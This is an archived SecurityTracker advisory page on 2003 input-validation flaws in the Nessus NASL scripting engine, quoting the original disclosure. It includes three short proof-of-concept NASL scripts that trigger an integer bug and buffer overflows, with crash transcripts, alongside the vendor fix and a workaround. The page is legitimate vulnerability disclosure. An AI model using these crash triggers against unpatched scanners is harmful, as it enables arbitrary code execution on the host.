SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   Tenable Nessus Vendors:   Deraison, Renaud et al
(Additional Details Are Provided) Re: Nessus Scanner Input Validation Flaws in libnasl and libnessus May Let Local Scripts Execute Arbitrary Code
SecurityTracker Alert ID:  1006828
SecurityTracker URL:  http://securitytracker.com/id/1006828
CVE Reference:   CVE-2003-0372, CVE-2003-0373, CVE-2003-0374   (Links to External Site)
Updated:  Jan 21 2004
Original Entry Date:  May 23 2003
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 2.0.5 and prior versions
Description:   A vulnerability was reported in the Nessus security scanner in libnasl. A local user's Nessus script may be able to execute arbitrary commands on the scanner host.

It is reported that a local user with a valid Nessus account and the ability to upload arbitrary Nessus plugins can upload a specially crafted script that can break out of the security sandbox and execute arbitrary commands on the operating system. The ability to upload arbitrary Nessus plugins is reportedly disabled by default ('plugins_upload' option should be set to 'no' in nessusd.conf).

According to the report, a malicious script can trigger this vulnerability by sending invalid parameters to the insstr() and ftp_log_in() functions and also to other nasl functions. Some similar flaws were reported in libnessus.

The vendor credits "Sir Mordred" <mordred@s-mail.com> with discovering some of these flaws.

In a separate message [see Message History], Sir Mordred provided additional details about the vulnerable functions.

In the insstr() function, a negative value for the fourth argument can trigger the flaw. A demonstration exploit transcript is provided:

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)

In the scanner_add_port() function, a buffer overflow can reportedly be triggered by a long 'proto' argument, as shown in the following demonstration exploit transcript:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

Finally, a buffer overflow in the ftp_log_in() function can reportedly be triggered by long 'user' and 'pass' arguments, as illustrated below:

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

Impact:   A local user with script upload privileges can execute arbitrary commands on the system. The commands will run with the privileges of the Nessus scanner (nessusd).
Solution:   The vendor has released a fixed version (2.0.6), available at:

http://www.nessus.org/nessus_2_0.html
http://ftp.nessus.org/nessus/nessus-2.0.6/
ftp://ftp.nessus.org/pub/nessus/nessus-2.0.6/

Vendor URL:  www.nessus.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
May 23 2003 Nessus Scanner Input Validation Flaws in libnasl and libnessus May Let Local Scripts Execute Arbitrary Code



 Source Message Contents

Subject:  nessus NASL scripting engine security issues


// @(#)Security advisory: Nessus NASL scripting engine security issues

Release date: May 23, 2003 
Name: Nessus NASL scripting engine security issues
Author: Sir Mordred <mordred@s-mail.com>

I. DESCRIPTION

The "Nessus" Project aims to provide to the internet community a free,
powerful, up-to-date and easy to use remote security scanner.
Nessus is very fast, reliable and has a modular architecture that allows
you to fit it to your needs. 
Please visit http://www.nessus.org for more information about Nessus.

II. DETAILS

There exists some vulnerabilities in NASL scripting engine.
To exploit these flaws, an attacker would need to have a valid Nessus
account as well as the ability to upload arbitrary Nessus plugins in the
Nessus server (this option is disabled by default) or he/she would need to
trick a user somehow into running a specially crafted nasl script.

Not that these issues can NOT be exploited by a tested host to crash
nessusd remotely.

* ISSUE 1 - Integer handling vulnerability in insstr() function

Vulnerability is triggered by a negative fourth argument:

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl)  insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)

* ISSUE 2 - Buffer overflow in scanner_add_port() function

Overflow is triggered by very long 'proto' argument:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

* ISSUE 3 - Buffer overflow in ftp_log_in() function

Overflow is triggered by very long 'user'/'pass' arguments:

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192)); 

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

III. VERSIONS TESTED

Linux RedHat 7.2

$ nasl -v | grep nasl
nasl 2.0.5

IV. VENDOR STATUS

New nessus 2.0.6 packages fixes these issues.

V. WORKAROUND

Make sure the option 'plugins_upload' is set to 'no' in nessusd.conf and
don't run unstrusted nasl scripts.

VI. CREDITS

Hank Leininger <hlein@progressive-comp.com> requested the source code audit
for some opensource projects and for nessus in particular.

Sir Mordred <mordred@s-mail.com> discovered the issues.

Renaud Deraison <deraison@nessus.org> fixed them in an hour after being
notified.

VII. ABOUT

I offering the absolutely free source code audit for opensourced
products. The programming languages acceptable for audit are: Perl, Python,
PHP, ASP, C/C++, Java. I will accept almost any code in these languages
which runs on Unix/Windows platforms.

All you need is to send the email to mordred@s-mail.com with the subject
"Security audit: source code"
and get the form in which you will answer several questions, such as
the description of the product, the details of obtaining the source code,
acceptable period of audit and so on.

After audit, you will receive the full description of vulnerabilities
found, along with the advices that will help you to fix them properly. When
you fix the vulnerabilities there should be released a public security
advisory in which the fix information will be contained and also i will be
properly credited.



________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you that
the full protection of e-mail correspondence is provided by S-mail
encryption mechanisms if only both, Sender and Recipient use S-mail.
Register at S-mail.com: http://www.s-mail.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC